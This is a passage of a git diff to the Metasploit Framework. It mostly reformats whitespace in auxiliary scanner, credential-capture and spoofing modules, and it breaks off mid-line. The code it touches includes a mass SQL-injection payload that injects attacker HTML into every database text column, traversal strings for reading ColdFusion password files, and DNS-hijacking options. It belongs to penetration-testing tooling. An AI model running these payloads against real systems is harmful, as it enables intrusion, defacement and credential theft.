'BLIND_SQL_INJECTION', :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else print_status("NO False Response.") @@ -289,15 +287,14 @@ class Metasploit3 < Msf::Auxiliary if falseres - #Very simple way to compare responses, this can be improved alot , at this time just the simple way - relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) - #true_false_dist = edit_distance(falseres.body,trueres.body) + #Very simple way to compare responses, this can be improved alot , at this time just the simple way + relfalsesize = falseres.body.length-(falseres.body.scan(/#{tarr[2]}/).length*tarr[2].length) + #true_false_dist = edit_distance(falseres.body,trueres.body) + #print_status("rellenf #{relfalsesize}") - #print_status("rellenf #{relfalsesize}") - - if reltruesize > relfalsesize - print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") + if reltruesize > relfalsesize + print_status("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") report_note( :host => ip, @@ -307,8 +304,8 @@ class Metasploit3 < Msf::Auxiliary :data => "#{datastore['PATH']} Parameter: #{key} Type: #{tarr[0]}" ) - else - print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") + else + print_status("NOT Vulnerable #{datastore['PATH']} parameter #{key}") end else print_status("NO False Response.") diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index f2438bda10..d0f5d9284f 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -93,13 +93,14 @@ class Metasploit3 < Msf::Auxiliary end #URL's that may work for you: - #"/CFIDE/administrator/enter.cfm", - #"/CFIDE/wizards/common/_logintowizard.cfm", - #"/CFIDE/administrator/archives/index.cfm", - #"/CFIDE/install.cfm", - #"/CFIDE/administrator/entman/index.cfm", - #"/CFIDE/administrator/logging/settings.cfm", +#"/CFIDE/administrator/enter.cfm", +#"/CFIDE/wizards/common/_logintowizard.cfm", +#"/CFIDE/administrator/archives/index.cfm", +#"/CFIDE/install.cfm", +#"/CFIDE/administrator/entman/index.cfm", +#"/CFIDE/administrator/logging/settings.cfm", + #Files to grab - #../../../../../../../../../../ColdFusion8/lib/password.properties%00en - #../../../../../../../../../../CFusionMX7/lib/password.properties%00en - #../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en +#../../../../../../../../../../ColdFusion8/lib/password.properties%00en +#../../../../../../../../../../CFusionMX7/lib/password.properties%00en +#../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 2ecdb56cce..523534ea1f 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary 'Copy_', 'Copy', '_' - ] + ] tpathf = datastore['PATH'] diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index ddfae8d814..319642a46a 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if (res and res.code >= 200 and res.code < 300) if res.to_s.include? "Index of /" and res.to_s.include? "<h1>Index of /" - print_status("Found Directory Listing #{wmap_base_url}#{tpath}") + print_status("Found Directory Listing #{wmap_base_url}#{tpath}") report_note( :host => ip, @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary end if res.to_s.include? "[To Parent Directory]</A>" and res.to_s.include? "#{tpath}</H1><hr>" - print_status("Found Directory Listing #{wmap_base_url}#{tpath}") + print_status("Found Directory Listing #{wmap_base_url}#{tpath}") report_note( :host => ip, diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index 7e452203c0..047613f7b5 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -18,11 +18,14 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Pull Archive.org stored URLs for a domain', - 'Description' => %q{ This module pulls and parses the URLs stored by Archive.org for the purpose of - replaying during a web assessment. Finding unlinked and old pages. }, + 'Description' => %q{ + This module pulls and parses the URLs stored by Archive.org for the purpose of + replaying during a web assessment. Finding unlinked and old pages. + }, 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$')) + 'Version' => '$Revision$' + )) register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index d9ed562b64..2562f9e41a 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -103,18 +103,17 @@ class Metasploit3 < Msf::Auxiliary # Send normal request to check if error is generated # (means the error is caused by other means) # - # + # begin normalres = send_request_cgi({ - 'uri' => datastore['PATH'], - 'vars_get' => gvars, - 'method' => datastore['METHOD'], + 'uri' => datastore['PATH'], + 'vars_get' => gvars, + 'method' => datastore['METHOD'], 'ctype' => 'application/x-www-form-urlencoded', - 'cookie' => datastore['COOKIE'], - 'data' => datastore['DATA'] - }, 20) - + 'cookie' => datastore['COOKIE'], + 'data' => datastore['DATA'] + }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE @@ -161,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary # # Test URI Query parameters - # + # found = false @@ -230,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary # # Test DATA parameters - # + # found = false @@ -307,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary # # Test COOKIE parameters - # + # found = false diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index 22e6bf086f..f5ea857e21 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -151,6 +151,6 @@ class Metasploit3 < Msf::Auxiliary end disconnect - end + end end diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 4cb132c45c..84774d99aa 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -51,28 +51,29 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - #Weird to indent for practical reasons. -infstr = %Q{ + # Weird to indent for practical reasons. + infstr = <<-EOF DECLARE @T varchar(255),@C varchar(255) - DECLARE Table_Cursor CURSOR FOR - select a.name,b.name from sysobjects a,syscolumns b - where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) - OPEN Table_Cursor - FETCH NEXT FROM Table_Cursor INTO @T,@C - WHILE(@@FETCH_STATUS=0) - BEGIN - exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''#{datastore['EVIL_HTML']}''') - FETCH NEXT FROM Table_Cursor INTO @T,@C - END - CLOSE Table_Cursor - DEALLOCATE Table_Cursor -}.gsub(/(\t|\n|\r)/,"") +DECLARE Table_Cursor CURSOR FOR +select a.name,b.name from sysobjects a,syscolumns b +where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) +OPEN Table_Cursor +FETCH NEXT FROM Table_Cursor INTO @T,@C +WHILE(@@FETCH_STATUS=0) +BEGIN +exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''#{datastore['EVIL_HTML']}''') +FETCH NEXT FROM Table_Cursor INTO @T,@C +END +CLOSE Table_Cursor +DEALLOCATE Table_Cursor +EOF + infstr.gsub!(/(\t|\n|\r)/,"") prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST(" poststr = " AS NVARCHAR(4000));EXEC(@S);" - gvars = queryparse(datastore['QUERY']) #Now its a Hash + gvars = queryparse(datastore['QUERY']) #Now its a Hash if gvars.has_key?(datastore['VULN_PAR']) diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 8ef68caec6..79c5b91b14 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -22,8 +22,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'HTTP Open Proxy Detection', 'Version' => '$Revision$', - 'Description' => 'Checks if an HTTP proxy is open. False positive are avoided - verifing the HTTP return code and matching a pattern.', + 'Description' => %q{ + Checks if an HTTP proxy is open. False positive are avoided + verifing the HTTP return code and matching a pattern. + }, 'References' => [ ['URL', 'http://en.wikipedia.org/wiki/Open_proxy'], diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index d7b29554d9..3b5063bad9 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -55,19 +55,19 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - conn = false + conn = false dm = datastore['NoDetailMessages'] extensions= [ 'bak', - 'txt', - 'tmp', - 'old', - 'temp', - 'java', - 'doc', - 'log' + 'txt', + 'tmp', + 'old', + 'temp', + 'java', + 'doc', + 'log' ] tpathfile = Pathname.new(datastore['PATH']) diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 45abd60bb0..8c0d6eb941 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '60317' ], [ 'BID', '37086' ], [ 'CVE', '2009-4189' ], - [ 'OSVDB', '60670' ], + [ 'OSVDB', '60670' ], [ 'URL', 'http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-085/' ], diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index e8ead27afc..a956866af8 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -83,11 +83,13 @@ class Metasploit3 < Msf::Auxiliary }, 10) if res - reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/, - /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/, - /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/, - /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, - /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/ + reg_info = [ + /<td>UserId<\/td><td>(\w+.*)<\/td>/, + /<td>Password<\/td><td>(\w+.*)<\/td>/, + /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/, + /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/, + /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, + /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/ ] print_status ("DETAIL: #{turl}") reg_info.each do |reg| diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 7c972d6356..57a729aad3 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary $uri = datastore['URI'].to_s if (user.length == 0 and pass.length == 0) - print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs without credentials") + print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs without credentials") begin res = send_request_raw({ @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary end else - print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs with given credentials") + print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashs with given credentials") do_login(user, pass) end diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index 8adfdb57ad..ee2adadbb8 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def do_login(user=nil,pass=nil) post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf" - vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'") + vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'") begin diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 4b1b65a2d0..082a39d9c2 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary 'iNotes/Forms5.nsf', 'iNotes/Forms6.nsf', 'iNotes/Forms7.nsf', - ] + ] check2 = [ 'help/readme.nsf?OpenAbout' diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 7cce0e8ba1..38d898b7b8 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -26,11 +26,15 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['MC'], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'DisclosureDate' => 'Sep 25 2009')) + 'DisclosureDate' => 'Sep 25 2009' + )) - register_options([Opt::RPORT(407),], self.class) + register_options( + [ + Opt::RPORT(407) + ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') end def run_host(ip) diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index fc92e9c974..c157ab66a7 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary :active => true ) return :next_user - else + else vprint_error("#{rhost}:#{rport} failed to login as '#{user}'") return end diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 3f7ad29daf..23563d3cb9 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -106,17 +106,22 @@ class Metasploit3 < Msf::Auxiliary :pass => pass, :active => true ) - return :next_user + return :next_user + rescue ::RbMysql::AccessDeniedError vprint_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") return :fail + rescue ::RbMysql::Error => e vprint_error("#{rhost}:#{rport} failed to login: #{e.class} #{e}") return :error + rescue ::Interrupt raise $! + rescue ::Rex::ConnectionError return :abort + end end diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index a60aecc283..3731634655 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle Enterprise Manager Control SID Discovery', 'Description' => %q{ This module makes a request to the Oracle Enterprise Manager Control Console - in an attempt to discover the SID. + in an attempt to discover the SID. }, 'Version' => '$Revision$', 'References' => diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index a6e3940d72..f7d49add65 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -28,11 +28,15 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'CG', 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'DisclosureDate' => 'Jan 7 2009')) + 'DisclosureDate' => 'Jan 7 2009' + )) - register_options([Opt::RPORT(1521),], self.class) + register_options( + [ + Opt::RPORT(1521) + ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') end def run_host(ip) diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index f0c39a6618..6796e5c459 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle Application Server Spy Servlet SID Enumeration.', 'Description' => %q{ This module makes a request to the Oracle Application Server - in an attempt to discover the SID. + in an attempt to discover the SID. }, 'Version' => '$Revision$', 'References' => @@ -33,7 +33,10 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) - register_options([Opt::RPORT(1158),], self.class) + register_options( + [ + Opt::RPORT(1158) + ], self.class) end def run_host(ip) diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 09446e7c56..97a01968db 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -28,9 +28,12 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009')) - register_options([Opt::RPORT(1521),], self.class) + register_options( + [ + Opt::RPORT(1521) + ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') end def run_host(ip) diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 5c6b9a7911..0eeebdaf4a 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], - [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'], + [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'], ], 'Author' => [ 'nebulus' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 6a401ac399..9bbc5ae322 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 751ea1e3a2..4db54d94f1 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ @@ -340,10 +340,10 @@ class Metasploit3 < Msf::Auxiliary # Handle image requests ctypes = { - "jpg" => "image/jpeg", - "jpeg" => "image/jpeg", - "png" => "image/png", - "gif" => "image/gif", + "jpg" => "image/jpeg", + "jpeg" => "image/jpeg", + "png" => "image/png", + "gif" => "image/gif", } req_ext = req.resource.split(".")[-1].downcase @@ -357,11 +357,11 @@ class Metasploit3 < Msf::Auxiliary "\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b" res = - "HTTP/1.1 200 OK\r\n" + - "Host: #{mysrc}\r\n" + - "Content-Type: #{ctype}\r\n" + - "Content-Length: #{data.length}\r\n" + - "Connection: Close\r\n\r\n#{data}" + "HTTP/1.1 200 OK\r\n" + + "Host: #{mysrc}\r\n" + + "Content-Type: #{ctype}\r\n" + + "Content-Length: #{data.length}\r\n" + + "Connection: Close\r\n\r\n#{data}" cli.put(res) return end diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index db7af34234..d657013516 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'WebServer' ] + [ 'WebServer' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 0510f9c99a..84c241e97c 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index 3a06c09e03..c2da640c98 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index be60211480..13446f7067 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Sniffer' ] + [ 'Sniffer' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index b554100a7a..641160377a 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Capture' ] + [ 'Capture' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index b481d29746..28054301d5 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 2ce8a857dd..11f4d12db8 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ @@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary } if(@log_console) - print_status("DNS #{addr[3]}:#{addr[1]} XID #{request.id} (#{lst.join(", ")})") + print_status("DNS #{addr[3]}:#{addr[1]} XID #{request.id} (#{lst.join(", ")})") end if(@log_database) diff --git a/modules/auxiliary/server/file_autopwn.rb b/modules/auxiliary/server/file_autopwn.rb index f8100b1391..4222e4a89e 100644 --- a/modules/auxiliary/server/file_autopwn.rb +++ b/modules/auxiliary/server/file_autopwn.rb @@ -371,7 +371,7 @@ class Metasploit3 < Msf::Auxiliary src = nil else print_status("404ing #{request.uri}") - send_not_found(cli) + send_not_found(cli) end cli.send_response(response) else @@ -427,7 +427,7 @@ class Metasploit3 < Msf::Auxiliary aret['ctype'] = "text/html" aret['cdisp'] = false when ".exe" then - aret['ctype'] = "application/octet-stream" + aret['ctype'] = "application/octet-stream" aret['cdisp'] = false when ".pdf" then # diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 53624e7082..44ce577c56 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -16,7 +16,7 @@ require 'rex/proto/proxy/socks4a' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Socks4a Proxy Server', @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Proxy' ] + [ 'Proxy' ] ], 'PassiveActions' => [ @@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary OptPort.new( 'SRVPORT', [ true, "The port to listen on.", 1080 ] ) ], self.class ) end - + def setup super @mutex = ::Mutex.new @socks4a = nil end - + def cleanup @mutex.synchronize do if( @socks4a ) @@ -58,19 +58,19 @@ class Metasploit3 < Msf::Auxiliary end super end - + def run opts = { 'ServerHost' => datastore['SRVHOST'], 'ServerPort' => datastore['SRVPORT'] } - + @socks4a = Rex::Proto::Proxy::Socks4a.new( opts ) - + print_status( "Starting the socks4a proxy server" ) - + @socks4a.start - + @socks4a.join end diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index ab2a8ce137..17a467759f 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE, 'Actions' => [ - [ 'Proxy' ] + [ 'Proxy' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index c1c12a1f59..64e08fc1a6 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary payload << dtp_neighbor_section n.l3.payload = payload - n.iface = datastore['IFACE'] + n.iface = datastore['IFACE'] n.pack() while @run n.send2() diff --git a/modules/auxiliary/spoof/cisco/pvstp.rb b/modules/auxiliary/spoof/cisco/pvstp.rb index 5cfb8df3a8..0429b0fdab 100644 --- a/modules/auxiliary/spoof/cisco/pvstp.rb +++ b/modules/auxiliary/spoof/cisco/pvstp.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/spoof/cisco/stp.rb b/modules/auxiliary/spoof/cisco/stp.rb index 3a4d8ae0fd..c8d6f4d378 100644 --- a/modules/auxiliary/spoof/cisco/stp.rb +++ b/modules/auxiliary/spoof/cisco/stp.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'Actions' => [ - [ 'Service' ] + [ 'Service' ] ], 'PassiveActions' => [ diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index a0a3983f32..4e09ac20a1 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -33,11 +33,10 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - ' I)ruid', 'hdm', - # - 'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method - # and was cool enough to email us and share! - # + 'I)ruid', 'hdm', + # Cedric figured out the NS injection method + # and was cool enough to email us and share! + 'Cedric Blancher <sid[at]rstack.org>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -49,27 +48,27 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], ], 'DisclosureDate' => 'Jul 21 2008' - )) + )) - register_options( - [ - OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), - OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), - OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), - OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), - OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']), - OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), - OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), - ], self.class) + register_options( + [ + OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), + OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), + OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), + OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), + OptAddress.new('RECONS', [true, 'The nameserver used for 